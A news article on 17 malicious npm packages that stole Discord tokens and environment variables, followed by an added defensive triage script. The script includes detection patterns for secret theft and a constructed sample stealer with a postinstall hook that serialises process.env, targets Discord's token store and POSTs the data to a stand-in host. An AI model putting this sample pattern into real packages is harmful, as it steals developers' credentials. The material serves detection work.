Malicious npm packages caught stealing Discord tokens, environment variables

The Node Package Manager (npm) security team has removed 17 JavaScript libraries this week that contained malicious code to collect and steal Discord access tokens and environment variables from users' computers.

"Luckily, these packages were removed before they could rack up a large number of downloads (based on npm records) so we managed to avoid a scenario similar to our last PyPI disclosure, where the malicious packages were downloaded tens of thousands of times before they were detected and removed," said Andrey Polkovnychenko and Shachar Menashe, two security researchers at DevOps security firm JFrog, and the ones who spotted and reported the malicious packages to the npm team.

Polkovnychenko and Menashe said that if a developer had downloaded and installed any of these libraries, they would have executed malicious code on their systems that either installed malware or collected data to send back to the attackers.

Four of the npm JavaScript libraries contained functions to collect Discord access tokens, which effectively act as authentication cookies and can allow attackers to hijack an infected developer's Discord account.

A fifth npm package contained a copy of PirateStealer, a piece of malware that could also extract other data from Discord apps and accounts, such as payment card details, login credentials, and personal information.

Another set of eleven libraries included functions that collected environment variables, which are details from a developer's local programming environment. These variables normally store user and OS information, but in some cases they can also contain API keys and login credentials, something an attacker would definitely be interested in collecting.

And last but not least, a 17th package also downloaded and installed a full-blown remote access trojan that granted the threat actor full control over a developer's computer.

However, while JFrog deserves credit for its recent discovery, the incident is not an isolated one. This year, both JFrog and fellow DevOps security firm Sonatype have found tens of malicious libraries uploaded to both the npm (JavaScript) and PyPI (Python) package repositories, and all signs point to some sort of process automation in the creation of these malicious packages at scale.
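To show what the two behaviours described above (code that runs during `npm install`, and code that harvests `process.env` or Discord's local token store and then opens an outbound connection) look like in a package, and how a reviewer can triage a dependency for them, the following is an added example written for this page. It is not code from the article, from JFrog, or from any of the removed packages. The lifecycle-hook list, the indicator regexes, the two sample packages and the host name `example.invalid` are all constructed assumptions for the example, not signatures for real malware.

```javascript
// Added example (not from the article or from JFrog): a heuristic triage check
// for an npm package, based on the two behaviours the article describes:
// code that runs at install time, and code that serialises process.env or reads
// Discord's local token store and then has a way to send the data out.
// The indicator patterns, sample packages and host name below are constructed.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicator patterns. Heuristic assumptions for this example, not real signatures.
const INDICATORS = {
  // Whole-environment dump: the cheapest way to grab every secret in a dev shell or CI job
  envDump: /JSON\.stringify\(\s*process\.env\s*\)/,
  // The Discord desktop client keeps its auth token in a LevelDB "Local Storage" directory
  discordStore: /discord.{0,120}?(?:Local Storage|leveldb|\.ldb)/is,
  // Anything that can carry the collected data off the machine
  outbound: /require\(\s*['"](?:https?|net|dgram|axios|node-fetch)['"]\s*\)|\bfetch\s*\(/,
};

// Lifecycle hooks in package.json that would execute code during `npm install`.
function installHooks(packageJson) {
  const scripts = (packageJson && packageJson.scripts) || {};
  return LIFECYCLE_HOOKS.filter((hook) => typeof scripts[hook] === "string");
}

// Tests every file's source against the indicators; returns { indicatorName: [fileNames] }.
function findIndicators(files) {
  const hits = {};
  for (const [name, src] of Object.entries(files)) {
    for (const [indicator, re] of Object.entries(INDICATORS)) {
      if (re.test(src)) (hits[indicator] || (hits[indicator] = [])).push(name);
    }
  }
  return hits;
}

// Combines the signals. A package is flagged when it both collects something worth
// stealing and has a way to send it; an install-time hook raises the severity because
// the code runs before the developer ever imports the library.
function triage(pkg) {
  const hooks = installHooks(pkg.packageJson);
  const hits = findIndicators(pkg.files);
  const collects = Boolean(hits.envDump || hits.discordStore);
  const exfiltrates = Boolean(hits.outbound);
  let verdict = "clean";
  if (collects && exfiltrates) verdict = hooks.length ? "malicious-on-install" : "suspicious";
  else if (hooks.length && exfiltrates) verdict = "review";
  return { name: pkg.packageJson.name, hooks, hits, verdict };
}

// Constructed sample mimicking the env-var + Discord-store stealer pattern
// (the package name and endpoint are invented; example.invalid never resolves).
const SAMPLE_STEALER = {
  packageJson: {
    name: "constructed-stealer-sample",
    version: "1.0.0",
    scripts: { postinstall: "node index.js" },
  },
  files: {
    "index.js": [
      "const https = require('https');",
      "const path = require('path');",
      "const store = path.join(process.env.APPDATA || '', 'discord', 'Local Storage', 'leveldb');",
      "const body = JSON.stringify(process.env);",
      "https.request({ hostname: 'example.invalid', method: 'POST', path: '/c' }).end(body);",
    ].join("\n"),
  },
};

// Constructed sample of a benign utility with only a test script.
const SAMPLE_BENIGN = {
  packageJson: { name: "constructed-benign-sample", version: "2.0.0", scripts: { test: "node test.js" } },
  files: { "index.js": "module.exports = (s, n) => String(s).padStart(n);" },
};

for (const pkg of [SAMPLE_STEALER, SAMPLE_BENIGN]) {
  console.log(pkg.packageJson.name, "=>", triage(pkg).verdict);
}
```

Run against a real dependency by reading its `package.json` and source files from `node_modules/<name>` into the same `{ packageJson, files }` shape. The check is deliberately coarse: a legitimate package may read `process.env` and make HTTP requests, so a `suspicious` or `review` verdict is a prompt to read the code, not a conviction, while an install-time hook combined with an environment dump and an outbound connection is the exact combination the article describes and should block the install.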